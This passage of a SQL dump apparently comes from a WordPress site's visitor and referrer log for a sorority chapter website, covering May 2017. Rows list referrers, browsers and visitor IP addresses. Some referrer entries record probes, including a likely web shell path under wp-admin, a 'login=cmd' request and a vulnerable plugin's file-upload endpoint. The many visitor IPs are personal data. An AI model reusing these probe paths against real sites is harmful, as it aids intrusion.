3029.110','','69.143.34.19','000',18,0),(4642,'2017-05-20','https://www.google.com/','Firefox','Windows','53.0','','73.173.91.7','000',5,0),(4643,'2017-05-20','https://www.bing.com/','Edge','Windows','14.14393','','192.12.13.14','000',3,0),(4644,'2017-05-20','http://zphiblgz.org','Firefox','Windows','40.1','','45.24.47.223','000',2,0),(4645,'2017-05-20','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.41','000',89,0),(4646,'2017-05-20','http://zphiblgz.org','Safari','iPad','10.0','','192.12.13.14','000',1,0),(4647,'2017-05-20','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4648,'2017-05-20','http://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&ved=0ahUKEwjoxZe_jv_TAhUGw4MKHRAsBi8QjRwIBw&url=http%3A%2F%2Fzphiblgz.org%2Fts_teams%2Ftamika-r-daniels%2F&psig=AFQjCNFFnpoJ639vh0JZA4QV-uBjkxoSgQ&ust=1495391662996857','MSIE','Windows','11.0','','98.233.232.62','000',8,0),(4649,'2017-05-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(4650,'2017-05-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(4651,'2017-05-20','http://zphiblgz.org','Safari','iPhone','10.0','','100.36.69.101','000',6,0),(4652,'2017-05-20','http://zphiblgz.org/','Chrome','Windows','39.0.2171.95','','118.189.64.68','000',3,0),(4653,'2017-05-20','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',1,0),(4654,'2017-05-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.162','000',4,0),(4655,'2017-05-20','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(4656,'2017-05-20','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(4657,'2017-05-20','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','167.160.178.117','000',1,0),(4658,'2017-05-20','https://www.google.com/','Chrome','Windows','58.0.3029.96','','100.16.225.132','000',3,0),(4659,'2017-05-20','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','24.0.1312.57','','5.61.34.51','000',1,0),(4660,'2017-05-20','http://zphiblgz.org/wp-admin/','Chrome','Windows','26.0.1410.64','','5.61.34.51','000',1,0),(4661,'2017-05-20','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.215.164','000',16,0),(4662,'2017-05-20','http://zphiblgz.org','MSIE','Windows','10.0','','185.7.215.164','000',1,0),(4663,'2017-05-20','http://zphiblgz.org','Firefox','Windows','29.0','','185.7.215.164','000',1,0),(4664,'2017-05-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.7.215.164','000',2,0),(4665,'2017-05-21','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',1,0),(4666,'2017-05-21','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',4,0),(4667,'2017-05-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','35.163.119.217','000',3,0),(4668,'2017-05-21','http://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.52','000',2,0),(4669,'2017-05-21','http://zphiblgz.org','Firefox','Windows','40.1','','116.74.219.106','000',1,0),(4670,'2017-05-21','https://www.bing.com/','Silk','Kindle Fire','57.1.109','','68.134.4.67','000',1,0),(4671,'2017-05-21','https://www.google.com/','Safari','iPhone','10.0','','108.45.151.230','000',1,0),(4672,'2017-05-21','http://zphiblgz.org','Chrome','Windows','40.0.2214.85','','192.198.80.227','000',2,0),(4673,'2017-05-21','http://zphiblgz.org','Firefox','Windows','3.6.8','','95.45.252.1','000',9,0),(4674,'2017-05-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(4675,'2017-05-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(4676,'2017-05-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.42.29.222','000',3,0),(4677,'2017-05-21','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4678,'2017-05-21','https://www.google.com/','Chrome','Android','51.0.2704.106','','66.87.80.204','000',9,0),(4679,'2017-05-21','http://m.facebook.com/','Chrome','Android','30.0.0.0','','66.87.80.18','000',1,0),(4680,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','76.0.137.174','000',1,0),(4681,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','100.36.81.55','000',1,0),(4682,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','73.216.164.211','000',1,0),(4683,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','100.16.188.145','000',1,0),(4684,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','108.3.163.150','000',1,0),(4685,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.3.1','','173.73.229.198','000',1,0),(4686,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','166.216.165.60','000',2,0),(4687,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','69.140.180.236','000',1,0),(4688,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','216.212.225.155','000',1,0),(4689,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','73.133.124.245','000',2,0),(4690,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','73.212.166.20','000',1,0),(4691,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','73.43.70.54','000',1,0),(4692,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','107.77.89.56','000',1,0),(4693,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','96.234.182.135','000',1,0),(4694,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','71.244.234.32','000',1,0),(4695,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','173.79.77.161','000',1,0),(4696,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','73.6.196.109','000',1,0),(4697,'2017-05-21','http://www.ens-pbs1914.com/links/','Safari','iPhone','10.0','','172.58.185.164','000',1,0),(4698,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','174.205.2.28','000',1,0),(4699,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','108.31.240.168','000',1,0),(4700,'2017-05-21','http://m.facebook.com/','Chrome','Android','56.0.2924.87','','73.172.195.202','000',1,0),(4701,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','71.163.93.2','000',1,0),(4702,'2017-05-21','http://m.facebook.com/','Chrome','Android','49.0.2623.105','','71.246.234.151','000',1,0),(4703,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','173.217.225.247','000',1,0),(4704,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','68.134.23.211','000',1,0),(4705,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','192.249.3.253','000',1,0),(4706,'2017-05-21','http://zphiblgz.org','Chrome','Windows','51.0.2704.103','','64.62.210.39','000',1,0),(4707,'2017-05-21','http://zphiblgz.org/wp-admin/css/maink.php','Chrome','Windows','5.0.375.99','','91.191.158.148','000',16,0),(4708,'2017-05-21','http://m.facebook.com/','Chrome','Android','49.0.2623.105','','71.244.209.129','000',1,0),(4709,'2017-05-21','http://m.facebook.com/','Chrome','Android','33.0.0.0','','172.58.225.125','000',1,0),(4710,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','107.17.183.91','000',1,0),(4711,'2017-05-21','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','24.170.224.92','000',1,0),(4712,'2017-05-21','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','66.148.121.112','000',1,0),(4713,'2017-05-21','http://zphiblgz.org','Firefox','Windows','40.1','','59.96.98.250','000',1,0),(4714,'2017-05-21','http://zphiblgz.org','Firefox','Windows','40.1','','154.118.66.240','000',2,0),(4715,'2017-05-21','http://m.facebook.com','AppleWebKit','iPhone','603.3.1','','172.223.25.188','000',1,0),(4716,'2017-05-22','http://zphiblgz.org','oodlebot','Unknown','1.0','','64.13.155.21','000',1,0),(4717,'2017-05-22','http://zphiblgz.org','Firefox','Windows','17.0','','185.50.250.64','000',1,0),(4718,'2017-05-22','http://zphiblgz.org','Firefox','Windows','17.0','','185.14.192.56','000',1,0),(4719,'2017-05-22','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','185.7.215.164','000',2,0),(4720,'2017-05-22','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','155.133.82.122','000',1,0),(4721,'2017-05-22','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',2,0),(4722,'2017-05-22','http://zphiblgz.org','Chrome','Linux','11.0.696.3','','5.39.85.81','000',111,0),(4723,'2017-05-22','http://m.facebook.com','AppleWebKit','iPhone','602.2.14','','73.172.207.32','000',1,0),(4724,'2017-05-22','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(4725,'2017-05-22','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','166.137.136.18','000',1,0),(4726,'2017-05-22','http://zphiblgz.org/wp-admin/post.php?post=982&action=edit','Chrome','Windows','58.0.3029.110','','69.143.34.19','000',38,0),(4727,'2017-05-22','http://m.facebook.com/','Chrome','Android','37.0.0.0','','100.36.60.15','000',1,0),(4728,'2017-05-22','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','68.33.89.118','000',1,0),(4729,'2017-05-22','https://www.google.com/','Safari','iPhone','10.0','','76.111.242.166','000',2,0),(4730,'2017-05-22','http://zphiblgz.org/','Chrome','Windows','34.0.1847.116','','191.101.72.230','000',2,0),(4731,'2017-05-22','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','72.82.50.53','000',1,0),(4732,'2017-05-22','https://www.google.com/','Firefox','Windows','53.0','','72.209.208.210','000',3,0),(4733,'2017-05-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.105.116','000',1,0),(4734,'2017-05-22','http://zphiblgz.org','Firefox','Windows','40.1','','79.106.209.107','000',2,0),(4735,'2017-05-22','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','104.7.224.83','000',1,0),(4736,'2017-05-22','http://zphiblgz.org/programs/','Chrome','Android','51.0.2704.106','','66.87.80.204','000',1,0),(4737,'2017-05-22','http://zphiblgz.org','Firefox','Windows','40.1','','138.117.10.4','000',2,0),(4738,'2017-05-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',2,0),(4739,'2017-05-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(4740,'2017-05-22','http://zphiblgz.org','Safari','Macintosh','10.0.3','','66.148.121.112','000',1,0),(4741,'2017-05-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.118','000',1,0),(4742,'2017-05-22','http://google.com','Firefox','Windows','40.0','','206.180.171.149','000',1,0),(4743,'2017-05-22','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','66.148.121.112','000',2,0),(4744,'2017-05-22','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.95.183.216','000',1,0),(4745,'2017-05-22','https://www.google.com/','Chrome','Android','58.0.3029.83','','174.205.14.188','000',3,0),(4746,'2017-05-22','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','75.176.167.97','000',1,0),(4747,'2017-05-22','http://zphiblgz.org','Firefox','Windows','40.1','','70.71.130.179','000',2,0),(4748,'2017-05-22','http://m.facebook.com/','Chrome','Android','58.0.3029.83','','50.232.32.201','000',1,0),(4749,'2017-05-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','163.172.103.145','000',1,0),(4750,'2017-05-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.127.226.150','000',1,0),(4751,'2017-05-22','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(4752,'2017-05-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.162','000',10,0),(4753,'2017-05-23','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.119','000',1,0),(4754,'2017-05-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.117','000',1,0),(4755,'2017-05-23','http://zphiblgz.org/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',2,0),(4756,'2017-05-23','http://zphiblgz.org','Firefox','Windows','40.1','','160.202.38.251','000',2,0),(4757,'2017-05-23','http://zphiblgz.org','oodlebot','Unknown','1.0','','64.13.155.21','000',1,0),(4758,'2017-05-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','35.161.220.188','000',3,0),(4759,'2017-05-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.213.8.236','000',2,0),(4760,'2017-05-23','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','186.150.192.218','000',1,0),(4761,'2017-05-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.94.204','000',1,0),(4762,'2017-05-23','http://zphiblgz.org','Firefox','Windows','40.1','','84.79.39.193','000',2,0),(4763,'2017-05-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',2,0),(4764,'2017-05-23','https://www.google.com/','Chrome','Windows','58.0.3029.110','','8.21.241.69','000',4,0),(4765,'2017-05-23','http://zphiblgz.org/','Safari','Macintosh','10.0.3','','163.172.4.153','000',1,0),(4766,'2017-05-23','http://zphiblgz.org','Firefox','Windows','40.1','','103.80.70.82','000',2,0),(4767,'2017-05-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(4768,'2017-05-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(4769,'2017-05-23','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','173.69.148.18','000',8,0),(4770,'2017-05-23','http://zphiblgz.org','Chrome','iPhone','58.0.3029.113','','173.69.148.18','000',5,0),(4771,'2017-05-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.45.3','000',1,0),(4772,'2017-05-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','212.47.239.33','000',1,0),(4773,'2017-05-23','http://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','62.210.79.79','000',1,0),(4774,'2017-05-23','http://zphiblgz.org/','Opera','Windows','12.17','','104.151.238.108','000',7,0),(4775,'2017-05-23','http://zphiblgz.org/','PHP','Unknown','5.3.97','','104.151.238.108','000',1,0),(4776,'2017-05-23','http://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','95.153.88.236','000',3,0),(4777,'2017-05-23','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','192.198.80.227','000',1,0),(4778,'2017-05-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.126.150','000',1,0),(4779,'2017-05-23','http://www.google.com/','Chrome','Android','58.0.3029.83','','174.205.20.166','000',1,0),(4780,'2017-05-23','http://zphiblgz.org/programs/','Chrome','Android','51.0.2704.106','','66.87.80.204','000',2,0),(4781,'2017-05-23','http://zphiblgz.org','Chrome','Linux','36.0.1995.6','','192.3.24.116','000',2,0),(4782,'2017-05-23','http://m.facebook.com','AppleWebKit','iPhone','602.4.6','','47.212.71.236','000',1,0),(4783,'2017-05-23','http://www.bing.com/search?q=zeta%20phi%20beta%20youtube%20lambda%20zeta&qs=n&form=QBRE&sp=-1&pq=zeta%20phi%20beta%20youtube%20l&sc=0-23&sk=&cvid=81329A80E7AE43C6ABE33859C531A940','MSIE','Windows','11.0','','70.196.23.87','000',13,0),(4784,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.7','000',8,0),(4785,'2017-05-24','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',2,0),(4786,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','164.132.51.91','000',7,0),(4787,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','166.70.207.2','000',5,0),(4788,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','154.0.154.139','000',2,0),(4789,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.245.60.8','000',2,0),(4790,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','128.65.236.88','000',2,0),(4791,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.233.105.123','000',3,0),(4792,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','109.163.234.5','000',5,0),(4793,'2017-05-24','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(4794,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','18.85.22.204','000',6,0),(4795,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','212.21.66.6','000',2,0),(4796,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',8,0),(4797,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.12','000',10,0),(4798,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.94.204','000',8,0),(4799,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','79.172.193.32','000',12,0),(4800,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.69','000',1,0),(4801,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','86.110.118.189','000',2,0),(4802,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.8','000',12,0),(4803,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.135','000',2,0),(4804,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.124.59.202','000',8,0),(4805,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.254.216.66','000',10,0),(4806,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.223.241','000',6,0),(4807,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.223.217','000',6,0),(4808,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.98.160','000',1,0),(4809,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.126.252.11','000',6,0),(4810,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.72','000',1,0),(4811,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.42.116.16','000',16,0),(4812,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',12,0),(4813,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',10,0),(4814,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.171.202.150','000',3,0),(4815,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.167','000',4,0),(4816,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',9,0),(4817,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.87.185.45','000',3,0),(4818,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',2,0),(4819,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',10,0),(4820,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.9','000',6,0),(4821,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.115.95.206','000',6,0),(4822,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.215','000',4,0),(4823,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',2,0),(4824,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.24.109','000',6,0),(4825,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.78','000',3,0),(4826,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.139.8.104','000',4,0),(4827,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.58.107.53','000',2,0),(4828,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.249.18','000',1,0),(4829,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.32.127.178','000',3,0),(4830,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.51','000',1,0),(4831,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.244','000',5,0),(4832,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.32','000',1,0),(4833,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.105.116','000',2,0),(4834,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',7,0),(4835,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.131','000',2,0),(4836,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','97.88.146.20','000',2,0),(4837,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','138.68.96.37','000',1,0),(4838,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.6.12','000',2,0),(4839,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.180.193.219','000',2,0),(4840,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',7,0),(4841,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.219.237.229','000',3,0),(4842,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.247.72.216','000',3,0),(4843,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.169.38','000',3,0),(4844,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.50.200.129','000',1,0),(4845,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.69.25','000',4,0),(4846,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.23.72.29','000',7,0),(4847,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.16','000',3,0),(4848,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.45.3','000',1,0),(4849,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.50.10','000',2,0),(4850,'2017-05-24','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.209.62.154','000',1,0),(4851,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.30','000',3,0),(4852,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.53.134','000',8,0),(4853,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',4,0),(4854,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','138.197.207.243','000',2,0),(4855,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.34.237.101','000',3,0),(4856,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.127.226.150','000',3,0),(4857,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.113.32.29','000',1,0),(4858,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.244.48.115','000',2,0),(4859,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',7,0),(4860,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.189.14.61','000',1,0),(4861,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','208.67.1.83','000',2,0),(4862,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','141.170.2.53','000',6,0),(4863,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','92.222.84.136','000',1,0),(4864,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',2,0),(4865,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',2,0),(4866,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.131.194','000',3,0),(4867,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.144.12.15','000',3,0),(4868,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.77.248.7','000',3,0),(4869,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','130.226.169.137','000',2,0),(4870,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.65','000',4,0),(4871,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.42','000',2,0),(4872,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',2,0),(4873,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','92.222.79.253','000',6,0),(4874,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',3,0),(4875,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','149.202.98.161','000',1,0),(4876,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.11','000',8,0),(4877,'2017-05-24','http://zphiblgz.org','Firefox','Windows','40.1','','199.21.166.190','000',2,0),(4878,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.43.205','000',2,0),(4879,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.85.192','000',1,0),(4880,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.126.252.12','000',6,0),(4881,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.224.43','000',2,0),(4882,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.169','000',5,0),(4883,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','167.114.77.220','000',1,0),(4884,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',3,0),(4885,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','141.5.104.227','000',3,0),(4886,'2017-05-24','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','156.40.255.24','000',1,0),(4887,'2017-05-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.209.62.154','000',1,0),(4888,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',5,0),(4889,'2017-05-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(4890,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.190.34','000',1,0),(4891,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.4','000',8,0),(4892,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','207.244.70.35','000',2,0),(4893,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.23.173.249','000',1,0),(4894,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',3,0),(4895,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',5,0),(4896,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.59.112.7','000',2,0),(4897,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','31.24.148.37','000',4,0),(4898,'2017-05-24','http://zphiblgz.org','Firefox','Windows','1.0.7','','54.196.24.103','000',1,0),(4899,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.204.218','000',2,0),(4900,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',10,0),(4901,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','196.54.55.42','000',1,0),(4902,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.121.77.37','000',1,0),(4903,'2017-05-24','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.65.205.10','000',3,0),(4904,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',7,0),(4905,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.107.180','000',4,0),(4906,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',2,0),(4907,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.138.30.11','000',2,0),(4908,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',5,0),(4909,'2017-05-24','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','132.88.254.2','000',5,0),(4910,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.37.18','000',3,0),(4911,'2017-05-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.168.178','000',3,0),(4912,'2017-05-24','http://zphiblg